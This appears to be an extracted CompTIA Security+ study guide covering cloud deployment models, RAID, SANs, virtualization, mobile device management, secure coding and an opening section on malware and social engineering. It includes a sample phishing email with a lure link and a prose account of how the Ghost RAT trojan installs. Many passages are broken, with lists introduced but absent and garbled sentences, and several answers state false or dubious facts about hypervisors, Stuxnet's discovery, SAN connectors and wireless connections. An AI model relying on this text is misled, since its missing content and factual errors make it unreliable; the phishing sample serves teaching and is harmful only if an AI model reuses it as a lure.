Normally, when a new site is opened, it needs to invest $50,000 in IT equipment, so the company has turned to a cloud model for the new equipment. They will lease the offices until sufficient sales have been made to invest in purchasing a property. All of the employees will have laptops and high-speed fiber broadband.

The network infrastructure will be cloud-based, therefore there is no need to purchase physical servers that would have an impact in reducing their cashflow. Cashflow is maintained, even though new equipment has been provided.

If they move to the cloud, it is going to cost them $60,000 a year. However, they don't need to find the whole $250,000 in one lump sum as the CSP will update their hardware perpetually so that the hardware will never be obsolete.

It will also help the company maintain a better cashflow, as capital expenditure is not required. The difference in price is 1.8% higher per year, which could be justified as there are no maintenance fees or disaster recovery site required, making it very cost-effective. The CSP deals with maintenance and disaster recovery as part of the cloud plan.

Exam tip:
Private cloud = single tenant. Public cloud = multitenant.
Community cloud = same industry.

Implementing different cloud deployment models

We will first of all look at the different cloud models and their characteristics, the most common cloud model is the public cloud, so let's start with that:


Figure 1: Public cloud

Just like in the public cloud, none of the tenants owns their apartment.

Example: A small company does not want to invest $50,000 in IT systems, so they purchase their cloud package from a cloud provider where they and another company are hosted by the cloud provider. This is similar to someone renting one apartment in a block from a landlord—you lease but do not own the flat. This is a multitenant environment where the cloud provider has multiple companies on the same virtual host.


Figure 2: Private cloud

Example: An insurance company wants its sales staff on a cloud environment where they can access resources from anywhere—whether they are at home, at a customer's site, or in a hotel room. The problem they have is that they do not wish to share resources with other cloud tenants. Therefore, they purchase the hardware and their IT team hosts its own private cloud. The benefit of this is that the sales team can access any resources they want at any time of day or night.

It is known as single-tenant, but like owning your own home, they buy the equipment.


Figure 3: Community cloud

In the preceding diagram, you can see lawyers on the left-hand side and on the right-hand side is a group of medical people—doctors and nurses. The lawyers cannot share the same software package as medical people, since they have different requirements. Therefore, Community Cloud 1 is for lawyers who have brainstormed and financed the perfect legal application, which is hosted in the cloud—this is private to them. Community Cloud 2 is for a group of medical people, it could maybe be two hospitals, who have designed and shared the cost of making the perfect medical software package, which is hosted by the CSP.

Three of the largest pawnbroking companies enter into a business venture where they get together and design the perfect application to enable their companies to be more efficient and save labor costs over time. The cloud provider creates this application and hosts it. This saves them the costs of purchasing new hardware. The cloud provider will also back up the data each night and guarantee a 99.99% availability of the systems. This is known as a community cloud as the application is no good to anyone who is not a pawnbroker.


Figure 4: Hybrid cloud

In the bottom left-hand corner, we have a brick factory. This is known as on-premises, where the company owns a brick-and-mortar building. In the top left are servers in the cloud. The cloud access security broker (CASB) enforces the company's policies between the on-premises situation and the cloud.

Cloud service models

There are different types of cloud services, and these are very heavily tested in the Security+ exam, therefore we will show screenshots of the types of offerings. We will first look at infrastructure as a service which is the model that you may have more control over:



Figure 5: Microsoft's IaaS offering (July 2018)

Exam tip:
IaaS is where you will install the operating system and patch it. This is the model you have more control over.



Figure 6: Goldmine—SaaS


Figure 7: Salesforce—SaaS


Figure 8: Microsoft Office 365—SaaS


Figure 9: Okta security as a service (SECaaS) for Google Apps

The preceding diagram shows Okta providing secure web authentication into Google Apps.

Disk resiliency and redundancy

We are going to look at different disk setups—some of which can provide fault tolerance or redundancy, meaning that if a disk fails, then the data is still available. RAID 0 is used for faster disk access, but provides neither fault tolerance nor redundancy. Let's first look at the different RAID setups, as these will be heavily tested.

Redundant array of independent disks

There is a need for the disk setup on servers to provide redundancy; this is where if one disk fails, the data is still available. We have already looked at failover clustering in Chapter 5, Understanding Network Components, where two servers share a quorum disk—the single point of failure in that scenario would be the shared disk. We are going to look at different Redundant Array of Independent Disks (RAID) levels and their characteristics:


Figure 10: RAID 0

This is known as a stripe set, as the data is written across Disks 1-3 in 64 KB stripes. Should one disk fail, then all of the data will be lost, so RAID 0 does not provide fault tolerance or redundancy. The benefit of RAID 0 is its faster read access, so it may be used for the proxy server's cache.


Figure 11: RAID 1

You can see from the preceding mirror set that the disk on the left has the original data and the disk on the right is a copy of that data. Should Disk 1 fail, you would "break the mirror" and then Disk 2 would provide the copy of the data for those who need access to it. At a later stage, we will add another disk and then reestablish the mirror set.


Figure 12: RAID 5

RAID 5 can suffer a single-disk failure but still allow access to the data, as the parity bits can recreate the missing data, but access will be slower than normal. This will give the IT team time to replace the missing disk.

Example: The preceding diagram represents a RAID 5 set, but we are using a mathematical equation to represent the disk set so that you can see the impact of losing one disk and then losing two disks:


Figure 13: RAID 5 as a mathematical equation

Each of the disks has a numerical value. For example, if Disk 3 fails, the equation would be (7 +? = 10) and the answer would be 3. If we lose a second disk, Disk 1, the equation would then be (? + ? = 10) and you could not work it out; the same happens if you lose two disks—parity cannot recreate the missing data.


Figure 14: RAID 6

A RAID 5 disk set can afford to lose one disk but still be available. The good thing about a RAID 6 set is that it can lose two disks and still be redundant as it has double parity.


Figure 15: RAID 10

From this diagram, you can see a RAID 1 on the left and then it is striped, so this will allow you to lose two disks.

Storage area network

A storage area network (SAN) is a hardware device that contains a large number of fast disks, such as solid-state drives (SSDs), and is isolated from the LAN as it has its own network. A SAN typically has host bus adapters (HBAs) (https://searchstorage.techtarget.com/definition/host-bus-adapter) and switches (https://searchnetworking.techtarget.com/definition/switch) attached to storage arrays and servers. The disks are set up with some form of redundancy, such as RAID 5 and upward, so that the storage space is redundant:


Figure 16: Storage area network

Each switch and storage system on the SAN must be interconnected, and the physical interconnections must support bandwidth levels that can adequately handle peak data activities. There are two connection types:

The servers that use SAN storage are diskless, but use the SAN storage as if they had disks installed, but you need very fast connection speeds so that the server does not suffer performance issues. Example Server 1 is a virtual host and it needs another 200 TB of data to host more virtual machines. It connects to the SAN using Ethernet and Ethernet switches, this connector is known as an iSCSI connector:


Figure 17: SAN—iSCSI Connector

The SAN allocates 200 TB by giving it a logical unit number (LUN). This is known as an iSCSI target. Server 1, which has been allocated the space, is known as the iSCSI initiator. Server 1 is diskless but still sets up the disk space using disk management as if it were a physical disk. To prevent latency, the connection between Server 1 and the SAN must be fast.

Understanding cloud storage concepts

It is quite common to use cloud storage to hold your data from the iCloud provided by Apple, Google Drive provided by Google, OneDrive provided by Microsoft, or Dropbox provided by Dropbox, Inc. The consumer versions of cloud storage allow you to have limited storage space, but offer to sell you a business version or additional storage by charging a monthly subscription fee. Let's look at the following image:


Figure 18: Cloud storage

In this diagram, you can see on the left-hand side a datacenter that has a vast amount of storage servers in a configuration called a server farm. The datacenter is a secure location where your data resides, but the data must stay within your world region. The datacenter has a backup datacenter to provide redundancy. The storage on these servers is likely to be diskless SAN storage.

Exploring virtual networks

A virtual network is very similar to a physical network in many ways, but for the Security+ exam, we must know the concepts of virtualization. To be able to host a virtual environment, we must install a hypervisor on a computer hosting the virtual machines. There are two different types of hypervisor:

Exam tip: Type 1 hypervisor can be installed on a bare metal machine—examples are VMWare, Hyper V, and ESX.

The main server in a virtual environment is called a host and the virtual machines are called guests. This is very similar to a party where the person holding the party is a host and the people attending the party are called guests. There are various different components to virtualization:


Figure 19: Virtualization

Now, we will look at each of the components:

Example: Server 1 is a virtual host, already has 50 guest machines, and is running out of physical disk space, but there is a requirement for Server 1 to host another 20 guest machines. There is enough memory and there are enough processing cores, but there is a lack of disk space. The solution would be to create a LUN on the SAN, giving Server 1 another 10 TB of disk space that it can allocate to the new virtual machines. Server 1 then connects to the SAN and configures the disk space allocated in disk management.


Figure 20: Virtual host with two guest machines


Figure 21: Virtual switch—Internal Network 1 with VLAN 2


Figure 22: Snapshot of Server 2016

Exam tip:
When we create a VLAN on a SAN, we will always use an iSCSI connector.

Virtual desktop infrastructure

A virtual desktop infrastructure (VDI) is a pool of virtual desktop pools for groups of users who share the same needs, such as a sales team whose members need access to the same applications and utilities on their desktops.

When the salespeople access their desktops, their settings are copied elsewhere; if the desktop becomes corrupt, another desktop from the pool is taken and the settings are then placed on the new desktop.
Example: A company has 50 users, who access their desktops remotely, as they are hosted in a virtual environment. There are another 100 virtual. There are 100 virtual machines all set up and waiting to be allocated to users. When a user uses their virtual machine, all of their desktop settings are copied onto another disk. If the virtual machine that they are using fails, then a new virtual machine is taken from the pool and their settings are then applied so that their desktop is recovered in the span of a few minutes.

VDE

When users use a virtual machine as their desktop, they can be set up in two ways: permanent or nonpermanent:

Heating, ventilation, and air-conditioning

The servers for both cloud and virtualization, the storage servers and virtual hosts, are located in server farms that are in data centers. If these servers get too hot, the devices will fail. Therefore, in a data center, we have hot and cold aisles:


Figure 23: HVAC

The cold aisle is where the cold air comes in and that faces the front of the servers. The rear of the servers face each other, they push out hot air into the hot aisles, and this is allowed to escape through a chimney. This way, the temperature can be regulated and this ensures the availability of the IT systems.

Network environments

Let's look at some of the network environments.

On-premises

On-premises is where your company's network is inside a physical building; you will then have physical firewalls, routers and switches. Each person will have a physical machine, the software is normally held on disks and, the IT team is on-site. You have total control and responsibility over your resources.

Hosted services

Hosted services are technology services offered to you or your company by a provider that hosts the physical servers running that service somewhere else. Access to the service is usually provided through a direct network connection that may or may not run via the internet. The hosted services provider has full responsibility over your resources, including backup.

Cloud-hosting services

Cloud-hosting services provide hosting on virtual servers, which pull their computing resources from high-end servers that obtain their storage from a SAN. Access to resources is either via a lease line or the internet. The cloud provider has full responsibility over the hardware and availability of the IT systems:


Practical exercise – is the cloud cost-effective?

In this exercise, you are going to go to Amazon Web Services, which provides a calculator to see how much you could save by moving your infrastructure into the cloud. The instructions are accurate at the time of printing, but you may need to use them as a guideline if Amazon changes its website.

Search Google for: Amazon Web Services, pricing. Or go to Amazon Web Services and press the Pricing tab. Perform the following steps:

  1. Select Pricing:

AWS Pricing: Calculate My Cloud Savings

  1. Press Calculate TCO

  2. How much did you save? Was it cost-effective?

  3. Now, search for another cloud provider and use their calculator to see who is more cost-effective.

Review questions

  1. In a cloud environment, what is elasticity?

  2. In which cloud environment would I install the software and then have to update the patches?

  3. Which cloud model is Office 365?

  4. What is the major benefit of using a public cloud?

  5. What is a cloud single-tenant model?

  6. What is a cloud multitenant model?

  7. Describe how a community cloud operates.

  8. What are the limitations imposed on a CSP regarding data storage?

  9. Who is responsible for the disaster recovery of hardware in a cloud environment?

  10. What is a cloud access security broker (CASB)?

  11. What model is it if you own the premises and all of the IT infrastructure resides there?

  12. What is a hybrid cloud model?

  13. What is distributive allocation?

  14. What type of model deals with identity management?

  15. What RAID model has a minimum of three disks? How many disks can it afford to lose?

  16. What are the two RAID models that have a minimum of four disks?

  17. What is the difference between RAID 5 and RAID 6?

  18. Where will a diskless virtual host access its storage?

  19. If you have a virtual switch that resides on a SAN, what connector will you use for a VLAN?

  20. What type of disks does a SAN use?

  21. Name a Type 1 hypervisor.

  22. What type of hypervisor can be installed on bare-metal machines?

  23. What is the machine that holds a number of virtual machines called?

  24. What is a guest and what is it called if you isolate it?

  1. In a virtual environment, what is sandboxing and how does it relate to chroot jail?

  2. Which is faster for data recovery: a snapshot or a backup tape?

  3. Why does HVAC produce availability for a datacenter?

  4. Which cloud model is it if you decide to use Salesforce?

  5. What do you call the cloud model where people from the same industry share resources and the cost of the cloud model?

  6. What is an example of cloud storage for a personal user?

Answer and explanations

  1. Elasticity allows you to increase and decrease cloud resources as you need them.

  2. Infrastructure as a service (IaaS) requires you to install the operating systems and patch the machines. The CSP provides bare-metal computers.

  3. Office 365 is a software as a service (SaaS) that provides email, Skype, and Office applications.

  4. The major benefit of a public cloud is that there is no capital expenditure.

  5. A private cloud is a single-tenant setup where you own the hardware.

  6. Public cloud is multitenant.

  7. A community cloud is where people from the same industry, such as a group of lawyers, design and share the cost of a bespoke application and its hosting, making it cost-effective.

  8. A CSP must store the data within regions. It cannot even more backup data to another region for resiliency.

  9. The CSP is responsible for the hardware fails.

  10. The CASB ensures that the policies between the on-premises and the cloud are enforced.

  11. On-premises is where you own the building and work solely from there.

  12. A hybrid cloud is where a company is using a mixture of on-premises and cloud.

  13. Distributive allocation is where the load is spread evenly across a number of resources, ensuring no one resource is overutilized. An example of this is using a load balancer.

  14. Security as a service (SECaaS) provides secure identity management.

  15. RAID 5 has a minimum of three disks and you can afford to lose one disk without losing data.

  16. RAID 6 and RAID 10 both have a minimum of four disks.

  17. RAID 5 has single parity and can lose one disk, where RAID 6 has double parity and can lose two disks.

  18. A diskless virtual host will get its disk space from a SAN.

  19. A VLAN on a SAN will use an iSCSI connector.

  20. A SAN will use fast disks, such as SSDs.

  1. Hyper V, VMware, and Zen are all Type 1 hypervisors.

  2. Type 1 hypervisors can be installed on bare-metal machines.

  3. A host holds a number of virtual machines—it needs fast disks, memory, and CPU cores.

  4. A guest is a virtual machine, for example a Windows 10 virtual machine, and if it is isolated it is called containers.

  5. Sandboxing is where you isolate an application for patching, testing, or because it is dangerous. A chroot jail is for sandboxing in a Linux environment.

  6. A snapshot is faster at recovering than any other backup solution.

  7. HVAC keeps the servers cool by importing cold air and exporting hot air. If a server's CPU overheats, it will cause the server to crash.

  8. Salesforce is an online sales package, this is software as a service (SaaS).

  9. A community cloud is where people from the same industry share resources.

  10. Cloud storage for personal users could be iCloud, Google Drive, Microsoft Onedrive, or Dropbox.

Managing Hosts and Applications Deployment

In this chapter, we are going to look at different mobile devices and their characteristics, and applications that run on those devices. In the Security+ exam, you need to know all of these aspects thoroughly, as this chapter is heavily tested. Let's first of all look at deploying mobile devices securely, followed by their management and security.

We will cover the following exam objectives in this chapter:

Deploying mobile devices securely

Mobile devices are now used in our everyday lives and they pose problems for security teams as they are very portable and extremely easy to steal. In this module, we will look at some of the problems that you may face as a security professional. First, let's look at the different deployment models.

Mobile Device Management (MDM) sets policies on the use of these tools to protect the network. For example, they may prevent the camera being used on mobile devices and could also prevent a smartphone from being able to send/receive texts.

Bring your own device

Bring Your Own Device (BYOD) is where an employee is encouraged to bring in their own device so that they can use it for work. Although it may save the employer money, it also has its pitfalls. BYOD needs to two policies to be effective:

Exam tip:
BYOD relies on an acceptable use policy and onboarding/offboarding policies being adopted.

Choose your own device

Choose Your Own Device (CYOD) avoids problems of ownership because the company has a variety of tablets, phones, and laptops. When a new employee comes along, they merely choose one of these devices from a list. When they leave the company and offboard, the devices are taken from them as they belong to the company. The acceptable user policy would state that the devices can only store company data as they are corporate-owned devices.

Corporate-owned personally-enabled

Corporate-Owned Personally-Enabled (COPE) is where the company purchases the device, such as a tablet, phone, or laptop, and allows the employee to use it for personal use. It is a much better solution for the company than BYOD. However, the IT team can limit what applications run on the devices as they as corporate-owned.

The COPE model can also help IT work within legal and regulatory parameters. Some European countries prohibit companies from wiping data on personal devices; if an employee loses a device, a remote wipe cannot be done. However, with COPE, the IT team has every right to wipe it remotely as it is corporate-owned and they remain compliant.

Virtual desktop infrastructure

A Virtual Desktop Infrastructure (VDI) is where an employee's desktop is based in the cloud or a virtual platform, and this can be accessed by using a mobile device, such as a tablet or laptop.

Mobile device connection methods

There are various different connection methods for mobile devices:

If you live in an area where the cellular data shows no service, you could turn on your modern smartphone using Wi-Fi calling to connect to their network—but beware, this is only a method to connect to your carrier's network, they still charge you as normal for the calls.

If you are connecting to a Wi-Fi hotspot in a hotel, you must be careful as most are insecure

Companies often have a guest wireless network that visitors can use, or their employees can use at lunchtime.

Exam tip:
Near field communication is used for contactless payment within 4 cm of the card.


Figure 1: SATCOM

Mobile device management concepts

MDM is a software that allows security administrators to control, secure, and enforce policies on smartphones, tablets, and other endpoint devices. Let us look at the different aspects of MDM.

Push notification services can be used to inform the device owner that an email or a text has arrived. For example, if someone sends you a message to your LinkedIn account, a push notification can tell you that you have a new message.

Accessing the device

Mobile devices are very small and very easy to steal, therefore we need to look at how we can prevent someone from accessing the data even if the device's host has been lost or stolen. We will first look at screen locks and passwords, followed by biometrics, and then context-aware authentication:

Exam tip:
Mobile devices need screen locks and strong passwords to protect them.

Device management

Corporate devices need to be controlled so that employees cannot simply connect to an app store and download every application that they wish. For example, allowing games on corporate devices would have an adverse impact on productivity and security. We are now going to look at the downloads, applications, and content managers, and their characteristics, followed by remote wipe:

Exam tip:
Geo-tracking will tell you the location of a stolen device.

Device protection

Mobile devices are very easy to lose or steal, so we must have some way of finding those devices; we are going to look at the differences between geofencing, geolocation, and using cable locks:

Exam tip:
Geofencing prevents mobile devices from being taken off the company's premises.

Device data

To protect the data that is stored on a device, we should implement Full Device Encryption (FDE) as this protects data stored on mobile devices when they are data at rest. The device requires a Trusted Platform Module (TPM) chip to store the encryption keys:

Containerization offers organizations the ability to deploy and manage corporate content securely in an encrypted space on the device. All corporate resources, such as proprietary applications, corporate emails, calendars, and contacts, reside within this managed space. We could also place an application inside a virtual machine to segregate it from the laptop.

Storage segmentation is where an external device is connected to a laptop, for example a USB flash drive, or it could be a Secure Data card (SD card). This allows the data on storage segmentation to be separate from any application or data already on the device.

Mobile device enforcement and monitoring

There are many different tools and features that roll out with mobile devices. As a security professional, you need to know the security threats that they pose. Some of the features that a security professional should be well-versed in are mentioned here:

Exam tip:
Rooting and jailbreaking remove the vendor restrictions on a mobile device to allow unsupported software to be installed.


Industrial control system

The Industrial Control System (ICS) is a general term that encompasses several types of control systems and instrumentation used for industrial process control. They are controlled by a SCADA system and are used for:

Supervisory control and data acquisition

Supervisory Control and Data Acquisition (SCADA) systems are automated control systems that are crucial for industrial organizations since they help to maintain efficiency, process data for smarter decisions, and communicate system issues to help mitigate downtime.

The SCADA system can be used for oil or gas refineries where there are multiple phases of production. Iran had a uranium enrichment facility that was a SCADA system, but it suffered an attack from the Stuxnet virus that attacked the centrifuges. The Stuxnet virus was discovered in 2007, but many believe it could have been there in 2005:


Figure 2: SCADA system

The security of the SCADA system is paramount. A network firewall prevents unauthorized access to the network, then they will use a NIPS as an additional layer. If further segmentation is required, they could use VLANs internally. This is no different from protecting a corporate network.

Mobile devices – security implications of embedded systems

An embedded system is an electronic system that has software and is embedded in computer hardware. Some are programmable and some are not. Embedded systems are commonly found in consumer, cooking, industrial, automotive, medical, communications, commercial, and military applications.

Examples:

Let's now look at each of these:


Figure 3: IoT devices

Exam tip:
Multifunctional devices can be attacked through their network interfaces.

Special-purpose devices

Special-purpose devices are more expensive bespoke devices that provide a unique purpose. For example, there are man overboard devices that detect someone falling into the water—we are going to look at a defibrillator.

Mobile medical devices can include infusion devices that measure fluids that are given to patients in hospital. (See the following picture). Ambulances will carry life-support systems, such as defibrillators, that are used to save a person's life if they have just suffered from cardiac arrest. The defibrillators will have an SoC installed as it gives out instructions on how to use it, but if it detects a pulse, it will not send a charge:


Figure 4: Defibrillator

Some luxury vehicles have embedded systems that produce a wireless hotspot in the car so that when you are driving along, your passengers can connect to the internet. Others have the ability to carry out automatic self-parking. There have been many trials recently of self-driving cars; vendors, such as Google, are still trying to perfect their systems.

For many years, people have been flying model aircrafts that also have embedded systems, but in the past 2-3 years, unmanned aerial vehicles called drones (aircraft/Unmanned Aerial Vehicles (UAV)) have been making the headlines. The military can use these drones to carry out surveillance of areas where it is too dangerous to send manned aircrafts. Some drones can be as large as a mini-aircraft, and some can be as small as a model aircraft but can have a camera attached so that aerial photographs can be taken.

Secure application development and deployment concepts

Some of the concepts used while securing an application during the development and deployment phases are as follows:

Development life cycle models – waterfall vs agile

The Software Development Life Cycle (SDLC) is a structure followed by a development team within the software organization. It consists of a detailed plan describing how to develop, maintain, and replace specific software. There are two main models that are adopted. One is the traditional method, which is called waterfall, and the more dynamic method is called agile.

Waterfall

The waterfall model is the traditional method used in the SDLC as it has a linear and sequential pattern to it. The development of the software moves from the top to the bottom, with each phase needing to be completed before the next phase can begin:


Figure 5: Waterfall model

It starts with gathering information about the requirement, then it is put into the design phase, and then it is implemented. The testing phase is carried out before it goes into production; any testing carried out will be rolled back prior to deployment. The maintenance phase is for patching and fixing any bugs.

Agile

The agile method anticipates change and breaks down each project into prioritized requirements, delivering each individually within an iterative cycle. Adaptability and customer satisfaction by rapid delivery are the key concepts of this model:


Figure 6: Agile model

Agile versus waterfall

Waterfall is a structured software development methodology, and can often be quite rigid, whereas the agile methodology is known for its flexibility. Waterfall must finish one process completely before it can begin another. Agile is dynamic and is geared for rapid deployment to ensure customer satisfaction.

Exam tip:Waterfall is an SDLC model that requires each step to be completed before starting the next step.

DevOps

DevOps is where the IT operations and developers work together in the entire service life cycle, from design to rollout to production support. They use many of the same techniques as developers for their systems work.

Secure DevOps

Secure DevOps is where the security team, IT operations, and developers work together on software development; the focus is on reducing the time it takes for the software to get into production, which is why they adopt an agile SDLC. There are processes that help them and they are:

Example: Security automation could be set up to scan for vulnerabilities at 6 pm without any human intervention.

Secure coding techniques

Although most people that work in networking or security are not application developers, CompTIA has introduced secure coding into the syllabus. This section needs to be understood so it is written in the simplest format we could think of:

If the data is not input in the correct format, it will not be accepted. Input validation on web pages lists errors in red at the top of the page of the incorrect entries; this prevents SQL injection, integer overflow, and buffer overflow attacks.

Exam tip:System errors to the users should be generic, but the logging of errors for administrators should log the full details.

Exam tip:
Stored procedures and input validation can prevent an SQL injection attack.

Exam tip:Obfuscation makes code obscure so that if it is stolen, it cannot be understood.

Code quality and testing

When an application developer writes an application, it needs to go through thorough testing before it is put into production. We need to ensure that the code does not have flaws or bugs that could be exploited by threat actors:

String s=null;

String s1="a";

String s2=s1+s;// null pointer exception

Exam tip:A null pointer exception points to an object that is stored as a null value.

Example: Microsoft has a tool called Jetstress that simulates a storage load on an Exchange email server. The administrator defines the number of users, and when Jetstress runs, it gives an output relating to the disk i/o and storage usage. The test results in a pass or fail.

Server-side versus client-side execution and validation

Website scripts run in one of two places:

Client-side validation is much quicker, but an attacker can exploit the JavaScript and bypass the client side. Server-side validation takes much longer, and can use input validation to check that the input is valid and to stop the attacker who has just bypassed the client side. There is more control over server-side validation and it is more secure.

Review questions

  1. What is the purpose of MDM?

  2. What is BYOD?

  3. What two policies need to be agreed upon before BYOD is implemented?

  4. How do BYOD and CYOD differ, and what are the benefits of CYOD to a company?

  5. Name three types of mobile device connection methods.

  6. What is used when we make a contactless payment using our debit card?

  7. Which services allows your mobile device to be notified when an email message arrives in your inbox?

  8. What two measures should I take to secure my mobile device?

  9. What will prevent my laptop from being stolen when I am in a meeting with my boss?

  10. What can I do to protect the data at rest on my mobile device?

  11. What can I implement if I want to keep my personal data and pictures separate from my corporate data on my smartphone?

  12. Once I have been authenticated by the VPN server, what method can be implemented to ensure that my mobile device is fully patched?

  13. What is rooting and which operating system does it affect?

  14. What is the purpose of jailbreaking and which operating system does it affect?

  15. If my smartphone is with T-Mobile, what can be done at the end of my 2 year contract so that I can use Verizon as my provider?

  1. What is the purpose of sideloading an application?

  2. What is the benefit of USB OTG?

  3. If I work in the R&D department, what are the two dangers when I take my cellphone to work?

  4. When I go on holiday with friends from school, how can people on my social media know where the photograph was taken?

  1. If I have been working in the sales department and have been using my cellphone to make work-related contactless payments, what does my company need to ensure happens during offboarding?

  2. What two methods can I use to set up a wireless connection with another mobile device when using a WAP?

  3. What is the purpose of tethering?

  4. What is an embedded electronic system? Give two examples.

  5. What is the purpose of a SCADA system?

  6. What category of device are my smart TV and wearable technology?

  7. What is home automation?

  8. What is the purpose of SoC?

  9. If a process is not carried out within a specified period of time, which causes the process to fail, what method am I using?

  10. What is the most likely way an attacker would gain control of an MFD?

  11. What is the purpose of the security team controlling the HVAC in a data center?

  12. Someone at work has suffered from a cardiac arrest, the first aid delegate takes out a defibrillator that give instructions of the steps to take. What had been built into the device to give these instructions?

  13. Give an example of embedded systems that can be used with vehicles.

  14. What is an UAV? Give two examples.

  15. What is the purpose of baselining?

  16. What type of system am I using if I totally destroy the system and create a new system when an update takes place?

  17. What software development life cycle is a traditional method that needs the previous stage to be complete before the next stage can start?

  1. What software development life cycle is fast and customer-focused?

  2. What is the purpose of secure automation in secure DevOps?

  3. What is the benefit of using continuous integration in secure DevOps?

  4. What is the main problem with a race condition when using an application?

  5. What is the perfect way to set up error handling in an IT system?

  6. Explain input validation and name three types of attacks that this could prevent.

  7. How can I prevent an SQL injection attack other than with input validation?

  8. What is the purpose of code signing?

  9. What is the purpose of obfuscation?

  10. What is dead code and how should it be treated?

  1. If I am an Android developer, what can I obtain from the internet to help me make an application and get it to market quickly?

  2. Explain how pointer dereference works.

  3. What is a null pointer exception?

  4. What is the technique used by developers to ensure that the application written conforms to the original specifications given by the customer?



Answers and explanations

  1. MDM sets and enforces policies to protect the network from mobile devices.

  2. BYOD is where you bring your personally owned device to use in the workplace.

  3. The acceptable use policy and onboarding/offboarding policies need to be agreed upon before you can implement BYOD.

  4. BYOD are personally owned devices, whereas CYOD are company-owned devices. Using CYOD allows the security administrators to remotely wipe the device if it is stolen and can make offboarding very easy as they own the device, so data ownership will never be an issue.

  5. Mobile devices can connect through cellular, wireless, and Bluetooth connections.

  6. Near field communication is used to make a contactless payment; the device must be within 4 cm of the card.

  7. Push notification services notify your mobile device when an email message arrives at your inbox.

  8. Screen locks and strong passwords are needed to secure a mobile device.

  9. A cable lock will prevent my laptop from being stolen when I am in a meeting with my boss.

  10. Full device encryption is used to protect the data at rest on my mobile device.

  11. Storage segmentation will allow you to keep personal data separate from business data on a cellphone.

  12. Network access control ensures that devices are fully patched before they enter the corporate network.

  13. Rooting can be carried out on Android devices where custom firmware is downloaded that removes restrictions that the vendor puts on the mobile device. This then allows you to run unauthorized software on the device.

  14. Jailbreaking is the same as rooting as it lifts the restriction on Apple's iOS devices. You can then install unauthorized software but can still access the Apple App Store.

  15. Carrier unlocking will allow me to use my smartphone on another carrier's network.

  16. Sideloading allows you to install third-party, unauthorized software on your mobile device.

  17. USB On-The-Go (OTG) allows you to connect a USB device to your mobile device. Apple does not allow USB OTG.

  1. If I work in a sensitive area, my cellphone will allow me to take pictures and post them on my social media. I could also make a video or record conversations of confidential meetings.

  2. Most modern smartphones use GPS tracking to store the location where pictures were taken.

  3. When they offboard people who use contactless payment on a smartphone, they need to ensure that the business credit card details have been removed from the wallet.

  4. Wi-Fi direct and an ad-hoc network allow wireless connections with another mobile device by using a WAP.

  5. Tethering allows you to use a cellphone on a laptop to provide internet.

  6. Embedded electronic systems have software embedded into the hardware, some are using SoC. Examples are microwave ovens, gaming consoles, security cameras, wearable technology, smart TVs, medical devices such as defibrillators, or self-driving cars.

  7. SCADA systems are industrial control systems used in the refining of uranium, oil, or gas.

  8. Smart TVs and wearable technology are classified as IoT devices.

  9. Home automation is where you can control temperature, lighting, entertainment systems, alarm systems, and many appliances.

  10. An SoC is a low-power integrated chip that integrates all of the components of a computer or electronic system. An example would be the controller for a defibrillator. Think of it as an operating system stored on a small chip.

  11. The Real-Time Operating System (RTOS) processes data as it comes in without any buffer delays. The process will fail if it is not carried out within a certain period of time.

  12. An attacker would most likely gain control of an MFD through its network interface.

  13. When a security team controls the HVAC in a data center, they can ensure that the temperature is regulated and the servers remain available. They also know which rooms are occupied based on the use of air-conditioning and electricity.

  14. An SoC gives instructions of the steps to take when using a defibrillator, however, if it detects a pulse, it will not send a charge.

  15. An example of embedded systems is vehicles that are either self-parking or self-driving.

  16. Unmanned aerial vehicles are drones or small, model aircrafts that can be sent to areas where manned aircrafts cannot go. They can be fitted with a camera to record events or take Ariel photographs; an example of these would be to determine the spread of a forest fire.

  1. Baselining is the process of recording all applications on a mobile device. You could then run the baseline at a later stage to find out what applications have been added since the last baseline.

  2. An immutable system is totally destroyed when an update is made. This is ideal for the cloud or virtual environment.

  3. Waterfall is a software development life cycle model that is traditional and needs each stage to be completed before the next stage can proceed.

  4. Agile is a software development life cycle model that is fast and customer-focused.

  5. Secure automation is where tasks, such as vulnerability scanning, are done by the computer and not the security administrator.

  6. Continuous integration is where the developer will send code to a central repository two or three times a day so that it can be validated.

  7. A race condition is when two threads of an application access the same data.

  8. The perfect way to set up error handling is for the user to get generic information but for the log files to include a full description of the error.

  9. Input validation is where data that is in the correct format is validated prior to being inserted into the system. SQL injection, buffer overflow, and integer overflow are prevented by using input validation.

  10. Other than input validation, a stored procedure can prevent an SQL injection attack.

  11. Code signing confirms that the code has not been tampered with.

  12. Obfuscation is taking code and making it obscure so that if it is stolen it will not be understood.

  13. Dead code is never used, but could introduce errors into the program life cycle, it should be removed.

  14. Using a third-party library will help a developer obtain code from the internet to help make an application and get it to market quickly? There are many for Android and JavaScript.

  15. When an object in programming has its value retrieved, this is known as a dereference.

  16. A null pointer exception is a runtime exception where the application has tried to retrieve an object with a null value.

  17. Model verification is a process used by developers to ensure that the application conforms to the original specifications.

Protecting Against Attacks and Vulnerabilities

In this chapter, we are going to look at attacks and vulnerabilities. Each type of attack will have its own unique characteristics. This module is probably the most heavily tested module in the Security+ exam. This chapter needs to be thoroughly understood as sometimes those type of attack questions are very vague, so if you do not understand the concepts fully, you may not understand what is being asked. 

We will cover the following exam objectives in this chapter:

Virus and malware attacks

In today's world, viruses and malware and rife; there are many different variants and we will look at each of these in turn:


Figure 1: Ransomware

Trojans attack the /System 32 and the SysWOW64 directory by placing a .dll file there.

For example, Ghost RAT is a remote access Trojan that was originally designed by threat actors in China. A user clicks on a link and a dropper program called server.exe installs Ghost RAT with a svchost.dll that then allows the attacker to take control of the computer. It can then log keystrokes, download and upload files, and run a webcam and microphone feeds.

In a Linux environment, a rootkit virus attacks the /usr/bin directory.

Social engineering attacks

Social engineering attacks rely on someone's personality as they try to exploit them. There are various social engineering attacks; let's look at each of them and the principles of why they are effective:


Figure 2: Phishing attack


Figure 3: Hoax virus

This email said that this cute little bear was a virus and it should be deleted, as anti-virus software from anti-virus vendors would not find it; this was true as it was not a virus. It was an operating system file and to delete it would damage your computer. The reason why this attack worked was the bear was there and the anti-virus did pick it up on a scan, therefore it looked real. Another example of a hoax would be purchasing fake anti-virus software that does not work.

From: Ian Neil (CEO)

To: All Staff

Subject: UPDATE YOUR FINANCIAL DETAILS

Dear All

The finance team are moving to a new finance application and have told me that personnel within the company have not updated their bank details. You need to click on this link and update your details: http://update.details.wehackyou.com.

Failure to do so by the end of play today will result in disciplinary action against those individuals that do not comply:

Kind Regards

Ian Neil

Chief Executive Officer

An email from your CEO, a high-level executive, or the HR manager telling you to fill in a form or click on a link is a social engineering authority attack.

